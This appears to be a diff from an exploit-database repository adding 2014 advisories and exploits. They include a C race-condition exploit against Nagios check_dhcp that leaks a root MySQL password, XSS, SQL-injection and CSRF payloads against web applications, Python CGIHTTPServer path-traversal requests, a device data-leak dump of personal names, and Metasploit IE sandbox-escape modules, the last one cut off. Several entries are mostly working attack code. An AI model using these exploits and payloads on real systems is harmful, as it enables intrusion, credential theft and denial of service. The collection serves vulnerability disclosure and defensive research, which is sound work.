http://www.exploit-db.com/exploits/33387/
The vulnerability was quickly patched by vendor in the release of nagios plugins
version 2.0.2 however the security measures in the patch are not sufficient and
the code is vulnerable to Race Condition attack.
Race Condition makes it possible for an arbitrary user to read parts of a
root-owned file despite the checks.
IV. DESCRIPTION
-------------------------
Nagios Plugins 2.0.2 introduces the following checks before the SUID root check_dhcp
program accesses a file provided by a user:
-----[ lib/parse_ini.c ]-----
/* We must be able to stat() the thing. */
if (lstat(i.file, &fstat) != 0)
die(STATE_UNKNOWN, "%s %s\n", _("Can't read config file."), strerror(errno));
/* The requested file must be a regular file. */
if (!S_ISREG(fstat.st_mode))
die(STATE_UNKNOWN, "%s\n", _("Can't read config file. Requested path is not a regular file."));
/* We must be able to read the requested file. */
if (access(i.file, R_OK|F_OK) != 0)
die(STATE_UNKNOWN, "%s %s\n", _("Can't read config file."), strerror(errno));
/* We need to successfully open the file for reading... */
if ((inifile=fopen(i.file, "r")) == NULL)
die(STATE_UNKNOWN, "%s %s\n", _("Can't read config file."), strerror(errno));
------------------------------
A configfile will only be opened if it is a regular file (not a symlink) and only if it
is readable by the real user running the program (checked with access() call).
These checks prevent a user from accessing a file that is not owned by them e.g:
$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=mysql@/root/.my.cnf
Can't read config file. Permission denied
However there's a possibility of a Race Condition here. If an attacker manages
to create a symlink leading to /root/.my.cnf in the very short time window that
occurs between the regular file/permission checks and the fopen() call then the
attacker could still be successful in obtaining the contents of the file.
V. PROOF OF CONCEPT
-------------------------
Below is an example exploit that demonstrates this attack.
-------[ checkdhcp_race_exploit.c ]-------
/* check_dhcp 2.0.2 Arbitrary Option File Read - Race Condition Exploit */
/* Created by Dawid Golunski (dawid@legalhackers.com) */
/* http://legalhackers.com */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#define TARGET "/usr/local/nagios/libexec/check_dhcp"
#define PROGARGS "--extra-opts=mysql@/tmp/access"
#define ROOT_CONFIG "/root/.my.cnf"
#define SYMLINK_FILE "/tmp/access"
#define MAX_DELAY 1500 // adjust if necessary
int main(int argc,char **argv)
{
char *arg[] = {TARGET, PROGARGS, 0};
int randomnum = 0;
/* Create empty file , remove if already exists */
unlink(SYMLINK_FILE);
open(SYMLINK_FILE, O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
if(fork() == (pid_t)0){
/* Child Proc */
execvp(TARGET, arg);
}
else{
/* Parent Proc */
srand ( time(NULL) );
randomnum = ( rand() % MAX_DELAY );
usleep(randomnum);
unlink(SYMLINK_FILE); /* Unlink the file */
symlink(ROOT_CONFIG, SYMLINK_FILE); /* Create symlink */
wait(NULL);
}
return 0;
}
-------------------------
Here is an example root mysql config file:
# cat /root/.my.cnf
[mysqldump]
quick
[mysql]
# saved password for the mysql root user
password=myRootSecretMysqlPass123
Here is the output of the running exploit:
$ while :; do ./checkdhcp_race_exploit; done
Invalid section 'mysql' in config file '/tmp/access'
Can't read config file. Requested path is not a regular file.
Can't read config file. Requested path is not a regular file.
Can't read config file. No such file or directory
Can't read config file. Requested path is not a regular file.
Can't read config file. No such file or directory
Can't read config file. No such file or directory
Can't read config file. Requested path is not a regular file.
Can't read config file. Requested path is not a regular file.
Can't read config file. No such file or directory
/usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=myRootSecretMysqlPass123'
Usage:
check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
[-i interface] [-m mac]
Invalid section 'mysql' in config file '/tmp/access'
Invalid section 'mysql' in config file '/tmp/access'
Invalid section 'mysql' in config file '/tmp/access'
As we can see it succeeds after some failed runs.
VI. BUSINESS IMPACT
-------------------------
Malicious user that has local access to a system where check_dhcp plugin is
installed with SUID could exploit this vulnerability to read any INI format
config files owned by root and potentially extract some sensitive information.
VII. SYSTEMS AFFECTED
-------------------------
Systems with check_dhcp SUID binary installed as a part of Nagios Plugins 2.0.2 is
vulnerable.
VIII. SOLUTION
-------------------------
Vendor has been informed about the vulnerability prior to the release of this advisory and
released another version of nagios plugins available at:
http://nagios-plugins.org/nagios-plugins-2-0-3-released/
IX. REFERENCES
-------------------------
http://nagios-plugins.org/nagios-plugins-2-0-2-released/
http://nagios-plugins.org/nagios-plugins-2-0-3-released/
http://legalhackers.com/advisories/nagios-check_dhcp.txt
http://legalhackers.com/advisories/nagios-check_dhcp-race.txt
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
May 26th, 2014: Advisory created
June 28th, 2014: Advisory updated and released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

9
platforms/multiple/remote/33905.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39771/info
Apache ActiveMQ is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ActiveMQ 5.3.0 and 5.3.1 are affected; other versions may also be vulnerable.
http://www.example.com:8161/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script>

40
platforms/multiple/remote/33907.txt Executable file
View file

@ -0,0 +1,40 @@
source: http://www.securityfocus.com/bid/39789/info
The ZKSoftware ZK5000 device is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Response from a coustom made scapy packets:-
#####################################################################################################
fb1h2s@fb1h2s:~$ sudo scapy
[sudo] password for adminuser:
/var/lib/python-support/python2.5/scapy.py:3118: Warning: 'with' will become a reserved keyword in Python 2.6
/var/lib/python-support/python2.5/scapy.py:3120: Warning: 'with' will become a reserved keyword in Python 2.6
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump()
Welcome to Scapy (v1.1.1 / -)
>>>ip=IP("192.168.*.*)
>>>udp=UDP(sport=4371,dport=4370)
>>>payload="Coustomcommands"
>>packet=ip/udp/payload
>>> sniff
<function sniff at 0x9f0333c>
>>sr1(packet)
Begin emission:
Finished to send 1 packets.
You could possibly get any thing you want from the system
BINGO :D
I am including a dump of the UDP communication with the hardware, and the data leakage as a reason of improper authentication.
...........Q[...L.WU[.....f.[...Ver 6.21 Sep 4 2008.....[...~OS.....[...~OS=1...hv[...~ExtendFmt...f>[...~ExtendFmt=0...jW[...ExtendOPLog.....[...ExtendOPLog=...X.[...~Platform.....[...~Platform=ZEM500.E..Y[...H....Q[...... .[...WorkCode....r[...WorkCode=0....E[.................F[..............3....D[..............@[.............U.........d......
MMr.K.Sug........d...e......MMr. Sant.)......e...f......MMrs. Anu/@......f...g......MMr. Kris@@......g...h......MMr. Domian......h...i......MMrs. Sho`n......i...j......MMr. B. S~)......j...k......MMs. Bhag_n......k...l......MMs. NishYn......l...m......MMr. Moha.)......m...n......
MMr. ChanXn......n...o......MMrs. Ruk^n......o...p......MMr. Prad.g......p...q......MMr. Kuma\n......q...r......MMr. Dhan[n......r...s......MMr. NirmZn......s...t......MMs. Lali1@......t...u......MMs. Nave.)......u...v......MMs. Sudh.)......v...w......
MMs. Anit2@......w...x......MMs. Poon3@......x...y......MMrs. Gee=@......y...z......MMs. Vidh<@......z...{......MMrs. BanB@......{...|......MMrs. Man]n......|...}......MMr.G.ThiWn......}...~......MMs. Indi........~..........MMrs. Jot...................MMrs. Kav...................
MMr. Thiy...................MMr. Prak.8.................MMs. Love.8.................MMr. Sund.8.................MMr. Kart.8.................MMs. Koma.8.................MMr. Prad.8.................MMr. ........MaheB`.................MMr. RajkC`.................MMr. NataD`.................MMr. ManoE`.................MMr. Varu<`.................
MMr. Than@`.................MMr. Rich=`.................MMr. Prak>`.................MMrs.A.Us?`.................MMrs.B.KaA`.................MMs. Banu._.................MMr. Stal.@.................MMr. Chan.@.................MMr. DhanQn.................MMr. MukiRn.................MMrs. Satcn.................MMs. Gomabn.................MMr. Ramadn.................
MMrs. Geeen.................
Trimmed....
Current vulnerability is checked and verified with zk5000 hardware model, possibly all other versions would be vulnerable.

313
platforms/multiple/webapps/33894.txt Executable file
View file

@ -0,0 +1,313 @@
Advisory: Python CGIHTTPServer File Disclosure and Potential Code
Execution
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs. This may enable attackers to disclose a CGI
script's source code or execute arbitrary CGI scripts in the server's
document root.
Details
=======
Product: Python CGIHTTPServer
Affected Versions:
2.7 - 2.7.7,
3.2 - 3.2.4,
3.3 - 3.3.2,
3.4 - 3.4.1,
3.5 pre-release
Fixed Versions:
2.7 rev b4bab0788768,
3.2 rev e47422855841,
3.3 rev 5676797f3a3e,
3.4 rev 847e288d6e93,
3.5 rev f8b3bb5eb190
Vulnerability Type: File Disclosure, Directory Traversal, Code Execution
Security Risk: high
Vendor URL: https://docs.python.org/2/library/cgihttpserver.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008
Advisory Status: published
CVE: CVE-2014-4650
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650
Introduction
============
The CGIHTTPServer module defines a request-handler class, interface
compatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits
behavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also
run CGI scripts.
(from the Python documentation)
More Details
============
The CGIHTTPServer module can be used to set up a simple HTTP server with
CGI scripts. A sample server script in Python may look like the
following:
------------------------------------------------------------------------
#!/usr/bin/env python2
import CGIHTTPServer
import BaseHTTPServer
if __name__ == "__main__":
server = BaseHTTPServer.HTTPServer
handler = CGIHTTPServer.CGIHTTPRequestHandler
server_address = ("", 8000)
# Note that only /cgi-bin will work:
handler.cgi_directories = ["/cgi-bin", "/cgi-bin/subdir"]
httpd = server(server_address, handler)
httpd.serve_forever()
------------------------------------------------------------------------
This server should execute any scripts located in the subdirectory
"cgi-bin". A sample CGI script can be placed in that directory, for
example a script like the following:
------------------------------------------------------------------------
#!/usr/bin/env python2
import json
import sys
db_credentials = "SECRET"
sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))
------------------------------------------------------------------------
The Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler
class which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:
class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
[...]
def do_GET(self):
"""Serve a GET request."""
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
def do_HEAD(self):
"""Serve a HEAD request."""
f = self.send_head()
if f:
f.close()
def translate_path(self, path):
[...]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = os.getcwd()
[...]
The CGIHTTPRequestHandler class inherits, among others, the methods
do_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The
class overrides send_head() and implements several new methods, such as
do_POST(), is_cgi() and run_cgi():
class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
[...]
def do_POST(self):
[...]
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, "Can only POST to CGI scripts")
def send_head(self):
"""Version of send_head that support CGI scripts"""
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
def is_cgi(self):
[...]
collapsed_path = _url_collapse_path(self.path)
dir_sep = collapsed_path.find('/', 1)
head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]
if head in self.cgi_directories:
self.cgi_info = head, tail
return True
return False
[...]
def run_cgi(self):
"""Execute a CGI script."""
dir, rest = self.cgi_info
[...]
# dissect the part after the directory name into a script name &
# a possible additional path, to be stored in PATH_INFO.
i = rest.find('/')
if i >= 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''
scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%r)" % scriptname)
return
if not os.path.isfile(scriptfile):
self.send_error(403, "CGI script is not a plain file (%r)" %
scriptname)
return
[...]
[...]
For HTTP GET requests, do_GET() first invokes send_head(). That method
calls is_cgi() to determine whether the requested path is to be executed
as a CGI script. The is_cgi() method uses _url_collapse_path() to
normalize the path, i.e. remove extraneous slashes (/),current directory
(.), or parent directory (..) elements, taking care not to permit
directory traversal below the document root. The is_cgi() function
returns True when the first path element is contained in the
cgi_directories list. As _url_collaps_path() and is_cgi() never URL
decode the path, replacing the forward slash after the CGI directory in
the URL to a CGI script with the URL encoded variant %2f leads to
is_cgi() returning False. This will make CGIHTTPRequestHandler's
send_head() then invoke its parent's send_head() method which translates
the URL path to a file system path using the translate_path() method and
then outputs the file's contents raw. As translate_path() URL decodes
the path, this then succeeds and discloses the CGI script's file
contents:
$ curl http://localhost:8000/cgi-bin%2ftest.py
#!/usr/bin/env python2
import json
import sys
db_credentials = "SECRET"
sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))
Similarly, the CGIHTTPRequestHandler can be tricked into executing CGI
scripts that would normally not be executable. The class normally only
allows executing CGI scripts that are direct children of one of the
directories listed in cgi_directories. Furthermore, only direct
subdirectories of the document root (the current working directory) can
be valid CGI directories.
This can be seen in the following example. Even though the sample server
shown above includes "/cgi-bin/subdir" as part of the request handler's
cgi_directories, a CGI script named test.py in that directory is not
executed:
$ curl http://localhost:8000/cgi-bin/subdir/test.py
[...]
<p>Error code 403.
<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').
[...]
Here, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and
returned True. Next, run_cgi() further dissected these paths to perform
some sanity checks, thereby mistakenly assuming subdir to be the
executable script's filename and test.py to be path info. As subdir is
not an executable file, run_cgi() returns an error message. However, if
the forward slash between subdir and test.py is replaced with %2f,
invoking the script succeeds:
$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py
{"text": "This is a Test"}
This is because neither is_cgi() nor run_cgi() URL decode the path
during processing until run_cgi() tries to determine whether the target
script is an executable file. More specifically, as subdir%2ftest.py
does not contain a forward slash, it is not split into the script name
subdir and path info test.py, as in the previous example.
Similarly, using URL encoded forward slashes, executables outside of a
CGI directory can be executed:
$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py
{"text": "This is a Test"}
Workaround
==========
Subclass CGIHTTPRequestHandler and override the is_cgi() method with a
variant that first URL decodes the supplied path, for example:
class FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):
def is_cgi(self):
self.path = urllib.unquote(self.path)
return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)
Fix
===
Update to the latest Python version from the Mercurial repository at
http://hg.python.org/cpython/
Security Risk
=============
The vulnerability can be used to gain access to the contents of CGI
binaries or the source code of CGI scripts. This may reveal sensitve
information, for example access credentials. This can greatly help
attackers in mounting further attacks and is therefore considered to
pose a high risk. Furthermore attackers may be able to execute code that
was not intended to be executed. However, this is limited to files
stored in the server's working directory or in its subdirectories.
The CGIHTTPServer code does contain this warning:
"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL"
Even when used on a local computer this may allow other local users to
execute code in the context of another user.
Timeline
========
2014-04-07 Vulnerability identified
2014-06-11 Customer approved disclosure to vendor
2014-06-11 Vendor notified
2014-06-15 Vendor disclosed vulnerability in their public bug tracker
and addressed it in public source code repository
2014-06-23 CVE number requested
2014-06-25 CVE number assigned
2014-06-26 Advisory released
References
==========
http://bugs.python.org/issue21766
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

143
platforms/multiple/webapps/33897.txt Executable file
View file

@ -0,0 +1,143 @@
Advisory: Endeca Latitude Cross-Site Request Forgery
RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF)
vulnerability in Endeca Latitude. Using this vulnerability, an attacker
might be able to change several different settings of the Endeca
Latitude instance or disable it entirely.
Details
=======
Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-002
Advisory Status: published
CVE: CVE-2014-2399
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2399
Introduction
============
Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.
(from the vendor's homepage)
More Details
============
Endeca Latitude offers administrators the ability to perform different
administrative and configuration operations by accessing URLs.
These URLs are not secured by a randomly generated token and therefore
are prone to Cross-Site Request Forgery attacks.
For example by accessing the URL http://example.com/admin?op=exit an
administrator can shut down the Endeca Latitude instance. Several other
URLs exist (as documented at [1] and [2]) which can be used to trigger
operations such as flushing cashes or changing the logging settings.
Proof of Concept
================
An attacker might prepare a website, which can trigger arbitrary
functionality (see [1] and [2]) of an Endeca Latitude instance if
someone opens the attacker's website in a browser that can reach Endeca
Latitude. An easy way to implement this is to embed a hidden image into
an arbitrary website which uses the corresponding URL as its source:
<img src="http://example.com/admin?op=exit" style="display:hidden" />
<img src="http://example.com/config?op=log-disable" style="display:hidden" />
[...]
Workaround
==========
The vendor did not update the vulnerable software, but recommends to
configure all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.
Fix
===
Not available. The vendor did not update the vulnerable software to
remedy this issue.
Security Risk
=============
The vulnerability can enable attackers to be able to interact with an
Endeca Latitude instance in different ways. Possible attacks include the
changing of settings as well as denying service by shutting down a
running instance. Attackers mainly benefit from this vulnerability if
the instance is not already available to them, but for example only to
restricted IP addresses or after authentication. Since this makes it
harder to identify potential target systems and the attack mainly allows
to disturb the service until it is re-started, the risk of this
vulnerability is considered to be low.
Timeline
========
2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
CPU
2014-03-13 Vendor responded with additional information about a
potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released
References
==========
[1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20administrative%20operations
[2] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20supported%20logging%20variables
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

7
platforms/php/webapps/33888.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39749/info
ProArcadeScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search.php?searchstr= [XSS]

11
platforms/php/webapps/33889.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39756/info
SmartBlog is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SmartBlog 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/v1.3/?mois=%2527&an=2010
http://www.example.com/v1.3/commentaire.php?id='
http://www.example.com/v1.3/?mois=3&an=>"><ScRiPt>alert(213771818860)</ScRiPt>

56
platforms/php/webapps/33896.txt Executable file
View file

@ -0,0 +1,56 @@
Details
================
Software: Simple Share Buttons Adder
Version: 4.4
Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P)
Description
================
CSRF and stored XSS in Simple Share Buttons Adder 4.4
Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display on the homepage. (In a real attack the form can be made to auto-submit using Javascript).
<form action=\"http://scone.local:8000/wp-admin/options-general.php?page=simple-share-buttons-adder\" method=\"POST\">
<input type=\"hidden\" name=\"ssba_options\" value=\"save\">
<input type=\"checkbox\" name=\"ssba_homepage\" value=\"Y\">
<input type=\"text\" name=\"ssba_text_placement\" value= \"below\">
<input type=\"text\" name=\"ssba_before_or_after\" value= \"after\">
<input type=\"text\" name=\"ssba_share_text\" value=\"<script>alert(\'foo\')</script>\">
<input type=\"submit\">
</form>
Mitigations
================
Immediately upgrade to version 4.5 or greater.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2014-06-19: Discovered
2014-06-25: Reported to WP.org and author via email
2014-06-26: Author reports issue fixed in version 4.5
Discovered by dxw:
================
Duncan Stuart
Please visit security.dxw.com for more information.

14
platforms/php/webapps/33906.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/39778/info
velBox is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
velBox 1.2 is vulnerable; other versions may also be affected.
The following example data is available:
http://www.example.com/velBox-cms-p30vel/admin/
javascript:document.cookie="login_admin=true;path=/

11
platforms/php/webapps/33908.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39796/info
Article Directory Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data is available :
Inject the following into the login options field.
' or 1=1 or ''='

11
platforms/php/webapps/33909.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39799/info
The Tele Data's Contact Management Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database
Tele Data's Contact Management Server 0.9 is vulnerable; other versions may also be affected.
The following proof-of-concept code is available:
javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

174
platforms/windows/local/33892.rb Executable file
View file

@ -0,0 +1,174 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::FileInfo
include Msf::Post::File
NET_VERSIONS = {
'4.5' => {
'dfsvc' => '4.0.30319.17929.17',
'mscorlib' => '4.0.30319.18063.18'
},
'4.5.1' => {
'dfsvc' => '4.0.30319.18408.18',
'mscorlib' => '4.0.30319.18444.18'
}
}
def initialize(info={})
super( update_info( info,
'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in the Internet Explorer Sandbox which allows
to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
Level. Further interaction with the component allows to escape the Enhanced Protected Mode
and execute arbitrary code with Medium Integrity.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate'=> "Feb 11 2014",
'References' =>
[
['CVE', '2014-0257'],
['MSB', 'MS14-009'],
['BID', '65417'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
end
def check
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
return Exploit::CheckCode::Unknown
end
net_version = get_net_version
if net_version.empty?
return Exploit::CheckCode::Unknown
end
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
return Exploit::CheckCode::Detected
end
mscorlib_version = get_mscorlib_version
if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Vulnerable
end
def get_net_version
net_version = ""
dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
dfsvc_version = dfsvc_version.join(".")
NET_VERSIONS.each do |k,v|
if v["dfsvc"] == dfsvc_version
net_version = k
end
end
net_version
end
def get_mscorlib_version
mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
mscorlib_version.join(".")
end
def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end
print_status("Searching .NET Deployment Service (dfsvc.exe)...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
end
net_version = get_net_version
if net_version.empty?
fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
end
print_good(".NET Deployment Service from .NET #{net_version} found.")
print_status("Checking if .NET is patched...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
end
mscorlib_version = get_mscorlib_version
if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
end
print_good(".NET looks vulnerable, exploiting...")
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
temp = get_env('TEMP')
print_status("Loading Exploit Library...")
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def cleanup
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
super
end
end

120
platforms/windows/local/33893.rb Executable file
View file

@ -0,0 +1,120 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
include Msf::Post::Windows::Priv
def initialize(info={})
super( update_info( info,
'Name' => 'MS13-097 Registry Symlink IE Sandbox Escape',
'Description' => %q{
This module exploits a vulnerability in Internet Explorer Sandbox which allows to
escape the Enhanced Protected Mode and execute code with Medium Integrity. The
vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll
component, which can be abused to force medium integrity IE to user influenced keys.
